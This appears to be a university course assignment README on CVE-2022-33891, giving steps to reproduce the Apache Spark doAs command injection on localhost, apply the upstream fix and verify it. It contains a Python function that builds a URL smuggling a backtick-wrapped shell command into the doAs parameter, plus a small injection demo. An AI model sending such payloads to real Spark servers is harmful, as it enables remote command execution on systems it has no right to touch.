# EP3 - MAC0352 Computer Networks and Distributed Systems 2023

Exploit reference: https://sploitus.com/exploit?id=365C423D-366E-5297-B931-75034A149CF2

## Topic: CVE-2022-33891

### Arbitrary shell command execution in a Spark application that uses ACL-based authentication

## Students

- Elinilson Vital
- Leonardo Bozzetto

# CVE-2022-33891 Patch Instructions for Ubuntu 22.04

## Prerequisites

- Ubuntu 22.04
- Git
- Maven
- Python 3

## Steps to Apply the Patch

1. Clone the fix repository:

```bash
git clone https://github.com/elsvital/cve-2022-33891-fix.git
```

2. Change into the unpatched Spark 3.2.0 source directory:

```bash
cd spark-3.2.0-no-patch
```

3. Compile Spark without the patch:

```bash
sudo ./build/mvn -DskipTests clean package
```

4. Start the Spark service:

```bash
sudo ./sbin/start-master.sh
```

5. Clone the vulnerability verification POC repository:

```bash
git clone https://github.com/HuskyHacks/cve-2022-33891
```

6. Navigate to the POC source directory:

```bash
cd cve-2022-33891
```

7. Verify the vulnerability:

```bash
python3 poc.py -u http://localhost -p 8080 --check --verbose
```
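Under the hood, the POC abuses the `doAs` query parameter: with ACLs enabled, Spark's `HttpSecurityFilter` hands the impersonated user name to a shell-based group lookup (`id -Gn <user>`), so backticks in the parameter execute arbitrary commands. A minimal sketch of how such a request URL can be built (the function name and layout are illustrative, not taken from `poc.py`):

```python
from urllib.parse import quote

def build_doas_url(host: str, port: int, command: str) -> str:
    """Build a URL whose doAs parameter smuggles a shell command."""
    # Backticks make the shell that later runs `id -Gn <user>`
    # execute `command` instead of treating it as a user name.
    payload = quote(f"`{command}`", safe="")
    return f"http://{host}:{port}/?doAs={payload}"

print(build_doas_url("localhost", 8080, "id"))
# → http://localhost:8080/?doAs=%60id%60
```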

8. Return to the main directory:

```bash
cd ..
```

9. Stop the Spark service:

```bash
sudo ./sbin/stop-master.sh
```

10. Apply the upstream fix, for example by downloading the commit as a patch and applying it to your local tree, or by merging the changes manually:

```bash
# Fix commit (fetched as a .patch file; assumes network access to github.com):
curl -L https://github.com/apache/spark/commit/1d524a88f6e93e9971a09f70eb2804dca51d578c.patch | git apply
```

11. Recompile Spark with the patch applied:

```bash
sudo ./build/mvn -DskipTests clean package
```

12. Start the Spark service again:

```bash
sudo ./sbin/start-master.sh
```

13. Navigate back to the POC source directory:

```bash
cd cve-2022-33891
```

14. Confirm the vulnerability is patched:

```bash
python3 poc.py -u http://localhost -p 8080 --check --verbose
```
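Conceptually, the upstream fix removes the shell from the group-lookup path: the vulnerable code built a `bash -c "id -Gn <user>"` command line from the attacker-controlled `doAs` value, while the fixed code passes the user name as a plain argument. Spark's actual change is in Scala; this Python sketch (assuming a Linux host with `bash` and coreutils `id`) only illustrates the difference between the two patterns:

```python
import subprocess

def groups_unpatched(user: str) -> str:
    # Vulnerable pattern: the user string is interpolated into a shell
    # command line, so metacharacters (backticks, ';') are executed.
    out = subprocess.run(["bash", "-c", f"id -Gn {user}"],
                         capture_output=True, text=True)
    return out.stdout

def groups_patched(user: str) -> str:
    # Fixed pattern: the user name is a single argv element; no shell
    # ever interprets it, so injection is not possible.
    out = subprocess.run(["id", "-Gn", user],
                         capture_output=True, text=True)
    return out.stdout

# An injected command runs only through the vulnerable pattern:
print("INJECTED" in groups_unpatched("; echo INJECTED"))  # True
print("INJECTED" in groups_patched("; echo INJECTED"))    # False
```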

## Video Tutorial

For a video walkthrough of the patching process, watch the tutorial at:
[![Watch the video](https://img.youtube.com/vi/zXdWVvaL58U/hqdefault.jpg)](https://youtu.be/zXdWVvaL58U)

## Additional Notes

Replace `http://localhost` with the appropriate IP address or hostname of your Spark service if necessary.
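Also note that CVE-2022-33891 is only exploitable when Spark's UI ACLs are enabled; with `spark.acls.enable` left at its default (`false`), the `doAs` parameter never reaches the shell-based group lookup. To reproduce the vulnerable configuration, something like the following in `conf/spark-defaults.conf` is needed:

```properties
# conf/spark-defaults.conf — enable UI ACLs (the vulnerable code path)
spark.acls.enable true
```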